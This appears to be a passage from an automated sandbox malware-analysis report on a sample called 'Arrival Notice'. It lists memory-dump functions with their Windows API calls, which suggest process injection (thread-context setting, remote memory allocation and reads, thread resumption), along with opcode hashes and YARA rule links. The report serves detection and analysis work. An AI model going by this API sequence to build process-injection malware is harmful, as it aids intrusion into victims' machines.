                                                                              • Instruction ID: ef3fe245d901fcd85086bece91acfe2b76439f199bdb10c38bf84581681c3b0b
                                                                              • Opcode Fuzzy Hash: f752903aa98f70ad6c6ec7d438d1e855ec7f8261665227d774771d98973ca208
                                                                              • Instruction Fuzzy Hash: 472148B19003199FDB10DFAAC5857EEBBF0AF49324F10C42AD459A7290CB789944CFA5
                                                                              Function 08225098 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 713 8225098-82250e3 715 82250f3-8225123 Wow64SetThreadContext 713->715 716 82250e5-82250f1 713->716 718 8225125-822512b 715->718 719 822512c-822515c 715->719 716->715 718->719
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08225116
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: a402e36076aa9b3d116ec3fa2baac0fe57a74be3de188962add1ef6914fe53c7
                                                                              • Instruction ID: 0342d4061c8fef1a18a6c807363e0e21414584de3098fc881004b92e12b5c5d3
                                                                              • Opcode Fuzzy Hash: a402e36076aa9b3d116ec3fa2baac0fe57a74be3de188962add1ef6914fe53c7
                                                                              • Instruction Fuzzy Hash: 932137B1910319DFDB10DFAAC5857EEBBF4EB49324F10C429D459A7240CB78A944CFA5
                                                                              Function 08225758 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 082257D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              • Opcode ID: 4e2513753d7a8de6f63e513d5bb20da9973716c0715a2ee1c9a3d579f400c2da
                                                                              • Instruction ID: 568af232badb47bbe2595d12e023f413de2155fdc13e07fdf161bdcfaf28a671
                                                                              • Opcode Fuzzy Hash: 4e2513753d7a8de6f63e513d5bb20da9973716c0715a2ee1c9a3d579f400c2da
                                                                              • Instruction Fuzzy Hash: 902139B1800359DFCB10DFAAC984AEEFBF5FF48310F108429E958A7250C738A544CBA5
                                                                              Function 0130D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0130D717
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: b3a68205b5704448260e1cb515eabbdf0e99e8e25810cb1960693c6ed05e5804
                                                                              • Instruction ID: c9e67bff06d73cb605ac9654feb6097012a7c889c32d3737e1983c9c0aba9197
                                                                              • Opcode Fuzzy Hash: b3a68205b5704448260e1cb515eabbdf0e99e8e25810cb1960693c6ed05e5804
                                                                              • Instruction Fuzzy Hash: CB21E4B5900248DFDB10CF9AD584ADEBFF8EB48314F14801AE918A7350C374A944CFA5
                                                                              Function 0130D689 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0130D717
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: 31ff6b47fb986504c79c725058b87894fd7c41493bea8d7f21bd19dfe90bcd56
                                                                              • Instruction ID: d4d28c10b704973acac75f9de57b81b0d13f5dd75c3606972fe55be8577c884b
                                                                              • Opcode Fuzzy Hash: 31ff6b47fb986504c79c725058b87894fd7c41493bea8d7f21bd19dfe90bcd56
                                                                              • Instruction Fuzzy Hash: 4C21E0B5900259DFDB10CFA9D584AEEBBF4EB48314F14841AE918B7250D378A954CFA4
                                                                              Function 0130A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0130B079,00000800,00000000,00000000), ref: 0130B28A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 4e2b2f46d97ee5e591b8f322824871557c11c24af1a5ac4f001ebebb8b4f9e6a
                                                                              • Instruction ID: aeed68885f4a1054a7f2bef00a0447db40d63c3129180dd2d53527da510a7366
                                                                              • Opcode Fuzzy Hash: 4e2b2f46d97ee5e591b8f322824871557c11c24af1a5ac4f001ebebb8b4f9e6a
                                                                              • Instruction Fuzzy Hash: C91123B6900308DFDB10CF9AD448AEEFBF8EB48314F10842AE919AB250C375A545CFA5
                                                                              Function 082255A0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08225616
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 439def6367923e8b250c4e71965cd6aa9ce9275911b240665cb4c2fbbc9052fe
                                                                              • Instruction ID: ef32a15692e7ad03b2e051ecc5b1a0773662bb9bb1fbae284d635674473d6bc6
                                                                              • Opcode Fuzzy Hash: 439def6367923e8b250c4e71965cd6aa9ce9275911b240665cb4c2fbbc9052fe
                                                                              • Instruction Fuzzy Hash: F31159B2900249DFCB10DFA9C9446EFBFF5EF88324F208819D469A7260C7359554CFA5
                                                                              Function 0130B218 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0130B079,00000800,00000000,00000000), ref: 0130B28A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 00e3bad9c830b6edd8b235abc512eec4470644ce93f2322ec25b56ceab878176
                                                                              • Instruction ID: f7cb455678df4d2f10eab1d7c9baabc8185238a59bdc181bfd99a4df18015aef
                                                                              • Opcode Fuzzy Hash: 00e3bad9c830b6edd8b235abc512eec4470644ce93f2322ec25b56ceab878176
                                                                              • Instruction Fuzzy Hash: EA1123BA9003488FDB10CFAAC444ADEFFF8EB48314F10842AD959AB350C375A545CFA5
                                                                              Function 082255A8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08225616
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 6fd2270423a83d7f02ffdcd26d91071d36cae6cb114ae44a70ca6fcff4f8ad31
                                                                              • Instruction ID: 568459cb707afa67c26f0601e11a3a7e4e666a3127846f2a4a589e0029a9adb5
                                                                              • Opcode Fuzzy Hash: 6fd2270423a83d7f02ffdcd26d91071d36cae6cb114ae44a70ca6fcff4f8ad31
                                                                              • Instruction Fuzzy Hash: 1E1156B1800249DFCB10DFAAC944AEFBFF5EB88320F108419E519A7250C775A544CFA4
                                                                              Function 08224FE2 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: 6e7c8c2cab296d5de1343609d0807f0f70f4f3aad650c2bb42c2d034ee2567b5
                                                                              • Instruction ID: a29dfbfca420f365fb13e9664926cc708469e8658433aa2365b1020c21be95b8
                                                                              • Opcode Fuzzy Hash: 6e7c8c2cab296d5de1343609d0807f0f70f4f3aad650c2bb42c2d034ee2567b5
                                                                              • Instruction Fuzzy Hash: AB1128B1D00259CBDB20DFAAC5447EEFBF4AB88324F24841AC559A7250C679A545CFA4
                                                                              Function 08224FE8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: ae1809eed35b477225fe4d64eb32fd6a45b26c68769fa603f5d01009f19d2098
                                                                              • Instruction ID: 626b46d23ff686290dec923711007bf675d5d027736b70c1cc07d90afd1997f0
                                                                              • Opcode Fuzzy Hash: ae1809eed35b477225fe4d64eb32fd6a45b26c68769fa603f5d01009f19d2098
                                                                              • Instruction Fuzzy Hash: 701158B1900358CBCB20DFAAC5447EEFBF4AB88324F208419C419A7250C639A944CBA4
                                                                              Function 0130AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0130AFFE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: a9ccca7a4195d0e74ad855894a2a6658c2e5169c60ad24b5e69706bdb6e6f6bd
                                                                              • Instruction ID: 9bb57a3b6471e52220d891d1c810aa977d1b38e667a6523dd5e16c52a689522a
                                                                              • Opcode Fuzzy Hash: a9ccca7a4195d0e74ad855894a2a6658c2e5169c60ad24b5e69706bdb6e6f6bd
                                                                              • Instruction Fuzzy Hash: 2A1110B5C003498FDB10CF9AD444BDEFBF4AB88328F10842AD928A7250C379A545CFA1
                                                                              Function 082296DC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 08229DBD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              • Opcode ID: 3e3b7b4bfd2361cb563fa57429a84fe6545e48b190d5952a733801e44ee1ff3e
                                                                              • Instruction ID: f1825ef037790b2064bccdec33241fc573d77a8fbf250d95fdcb7bf8aaaf01d0
                                                                              • Opcode Fuzzy Hash: 3e3b7b4bfd2361cb563fa57429a84fe6545e48b190d5952a733801e44ee1ff3e
                                                                              • Instruction Fuzzy Hash: A51122B5800318DFCB10DF8AD588BDEBFF8EB48320F108419E918A7201C375A984CFA5
                                                                              Function 08229D58 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 08229DBD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              • Opcode ID: 3b2857f7cb5cbddb8c0303d8cc2b4ffc1cc4a656fed73e934b3489351e607bc0
                                                                              • Instruction ID: 6f1c943ce8d2c73ca2fcacfac17561e5ebcd3338f1aebbb89b86054d955a6b1a
                                                                              • Opcode Fuzzy Hash: 3b2857f7cb5cbddb8c0303d8cc2b4ffc1cc4a656fed73e934b3489351e607bc0
                                                                              • Instruction Fuzzy Hash: B511F2B5800359DFDB10DF99D984BDEBBF8FB48324F108519E968A7250C374A984CFA1
                                                                              Function 0126D63C Relevance: .1, Instructions: 77COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706380814.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_126d000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 793c87e3f4e94c660b952095217aa554961271d4149a3957a802ebd08e5ae5cc
                                                                              • Instruction ID: 19fbb2601dac42eea041fbba8c60d762d57537970c601cf8009340c6b0b84fdd
                                                                              • Opcode Fuzzy Hash: 793c87e3f4e94c660b952095217aa554961271d4149a3957a802ebd08e5ae5cc
                                                                              • Instruction Fuzzy Hash: 1F213871210248DFCB059F54E9C0F16BF6AFB88314F248269EA490B296C37AD895CBA1
                                                                              Function 0126D4C4 Relevance: .1, Instructions: 75COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706380814.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_126d000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f873be7c20bfeb84538c80585e886623f9871408a1abc54147391f3c8a5bcebf
                                                                              • Instruction ID: d9de5cd99896560466f29c595f844d743131420639f1bf9a029d6b25f276df97
                                                                              • Opcode Fuzzy Hash: f873be7c20bfeb84538c80585e886623f9871408a1abc54147391f3c8a5bcebf
                                                                              • Instruction Fuzzy Hash: F421457161024CDFCB01DF58E9C0B26BF69FB88318F20C169E9890B696C336D486CAA1
                                                                              Function 0126D3D8 Relevance: .1, Instructions: 75COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706380814.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_126d000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 082f6bb12e1a70bf9fdd4862f17a1a564d6d9f66c715b2b5e9689b511d212f3f
                                                                              • Instruction ID: 9ea2d1bc0c3191661b637c14df0502c360a942b5cb3110fcac6469b4cc60df47
                                                                              • Opcode Fuzzy Hash: 082f6bb12e1a70bf9fdd4862f17a1a564d6d9f66c715b2b5e9689b511d212f3f
                                                                              • Instruction Fuzzy Hash: E421487521024CDFDB01DF48C9C0B56BF69FB98314F20C169D9494B296C336E896CAA1
                                                                              Function 0127D01C Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706445796.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_127d000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cd5658ca64aef9b8038f0282f43353bc9b8de2a68ba166c22bb305acf96c7721
                                                                              • Instruction ID: 03c5ade4aab30b002c6ae7bd3762d40a711d459352f7c1ffaca4faa8f446766f
                                                                              • Opcode Fuzzy Hash: cd5658ca64aef9b8038f0282f43353bc9b8de2a68ba166c22bb305acf96c7721
                                                                              • Instruction Fuzzy Hash: 6A214F70214208DFCB12DF68D980B27BFA1EF88314F20C56DE90A4B296C37AD807CA61
                                                                              Function 0127D006 Relevance: .1, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706445796.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_127d000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 470773100b110789c22d78173341bb4acd58ba6acc932c1cd998130aef0bc70a
                                                                              • Instruction ID: 5af02131c4394ddeb7ac7bec84989df65707b09a3fee94a0eaba80baf6d0d3d6
                                                                              • Opcode Fuzzy Hash: 470773100b110789c22d78173341bb4acd58ba6acc932c1cd998130aef0bc70a
                                                                              • Instruction Fuzzy Hash: 04217C755093848FDB03CF24D994716BF71EF46314F28C5EAD9498B6A7C33A980ACB62
                                                                              Function 0126D637 Relevance: .1, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706380814.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_126d000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                              • Instruction ID: 38d58a2c93ef62605dbc539df464e6337fa4fcad26e6ce322a509d390aad2bdc
                                                                              • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                              • Instruction Fuzzy Hash: A521D276504288DFCB06CF54D9C4B16BF72FB88314F24C2A9DE480B256C33AD456CB92
                                                                              Function 0126D4BF Relevance: .1, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706380814.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_126d000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction ID: 838ee2082a49a043795e66daca521c25c5cbb6db0de24e1f9d73af6c082ef56f
                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction Fuzzy Hash: 50110376504288CFCB12CF54D5C4B16BF71FB84318F24C6AAD9490B657C336D45ACBA1
                                                                              Function 0126D3D3 Relevance: .1, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706380814.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_126d000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction ID: 52e64e0b13a5654dbbc28c616965d1191688a5e0c52ef7f0376b7658c9cbb2f8
                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                              • Instruction Fuzzy Hash: A4110376504288CFDB02CF44D5C4B56BF71FB94324F24C2A9D9490B297C33AE85ACBA1
                                                                              Function 0126D7B1 Relevance: .0, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706380814.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_126d000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6c2b4c548666a8c45bb9ad7f2d9039a3179cff0474e9c2aa6e108faf56de4d66
                                                                              • Instruction ID: be6f4be6ad86b3d87cb8d59dcfff869703e4e2701302bcdc34a4b55e4d05e554
                                                                              • Opcode Fuzzy Hash: 6c2b4c548666a8c45bb9ad7f2d9039a3179cff0474e9c2aa6e108faf56de4d66
                                                                              • Instruction Fuzzy Hash: E501F77161834D9AE7114A6ACDC8767BF9CEF40324F18C52AEE8C4E1C2C6799881C6B2
                                                                              Function 0126D7B0 Relevance: .0, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706380814.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_126d000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 36d993056f329206b2ddf4e47ecb4647b573f3c04ee10774c8c67a6ad1c6b006
                                                                              • Instruction ID: a32364197697380dfe8a52364fd5a608425ff58db106818a921bd10464c444d0
                                                                              • Opcode Fuzzy Hash: 36d993056f329206b2ddf4e47ecb4647b573f3c04ee10774c8c67a6ad1c6b006
                                                                              • Instruction Fuzzy Hash: 7DF0C271504348AAE7108A1ADDC8B62FFACEB40724F18C55AEE4C4F282C2799885CAB0

                                                                              Non-executed Functions

                                                                              Function 082230E8 Relevance: .3, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ff428fcaef0b5dad401c8b9b205a667dd73de6702f10b36a83a9ebf3136806d7
                                                                              • Instruction ID: 55fe1c5fb042a6cbd123dabfe5ee83cea80d82ed9b1678506a9fe8415ffbd894
                                                                              • Opcode Fuzzy Hash: ff428fcaef0b5dad401c8b9b205a667dd73de6702f10b36a83a9ebf3136806d7
                                                                              • Instruction Fuzzy Hash: D8E11874E10159DFCB14DFA9C5849AEBBF2FF89305F248169E418AB316DB34A941CFA0
                                                                              Function 08225170 Relevance: .3, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f448f34aaf3160ac0956347af60f4286ad65fdf1c77712071e5e69612da12e49
                                                                              • Instruction ID: bf2d16e238c67654070028e8c66921c4a4a1bd2ebf2ea4040deb79f8f924b593
                                                                              • Opcode Fuzzy Hash: f448f34aaf3160ac0956347af60f4286ad65fdf1c77712071e5e69612da12e49
                                                                              • Instruction Fuzzy Hash: C9E11674E10119CFCB54CFA9C5809AEBBB2FF89301F24D169E414AB356D730A982CF60
                                                                              Function 08222CB0 Relevance: .3, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a66b84d3ac7147e5fbf213ef967caf29eeaf948827b19074c845b0291ae6d2b6
                                                                              • Instruction ID: feac2f3671b636e40fc5b529de283d6dd31b4866b51fd02616577782e96dfd88
                                                                              • Opcode Fuzzy Hash: a66b84d3ac7147e5fbf213ef967caf29eeaf948827b19074c845b0291ae6d2b6
                                                                              • Instruction Fuzzy Hash: 77E1F674E10129DFCB14DFA9D5809AEFBF2FB49301F248169E418AB35AD735A942CF60
                                                                              Function 08223520 Relevance: .3, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5f8b4122d013c967f3840bf03fde9c1efb89a95bcf71635958e4a52abb3218c6
                                                                              • Instruction ID: 691a30915e6eebcd2cdadb2553ac6241f6b213082171a46c42543dc9b20c6756
                                                                              • Opcode Fuzzy Hash: 5f8b4122d013c967f3840bf03fde9c1efb89a95bcf71635958e4a52abb3218c6
                                                                              • Instruction Fuzzy Hash: ACE117B4E10159DFCB14DFA9C5849AEFBB2FF89305F248169D418AB315D734A982CF60
                                                                              Function 082247C0 Relevance: .3, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ab2a2d490a9ee356c7ba71a1cb17def5f6dc1e2adef9e79d1bfe3680d0400aca
                                                                              • Instruction ID: 3c9ff07a5c8c3990b1447e36e4b696b2b782b38adeec56839a264c302bbd749f
                                                                              • Opcode Fuzzy Hash: ab2a2d490a9ee356c7ba71a1cb17def5f6dc1e2adef9e79d1bfe3680d0400aca
                                                                              • Instruction Fuzzy Hash: 1DE117B4E10159DFCB14DFA9C5809AEBBF2FF89305F248169E418AB356D730A942CF64
                                                                              Function 0130D5BC Relevance: .3, Instructions: 264COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
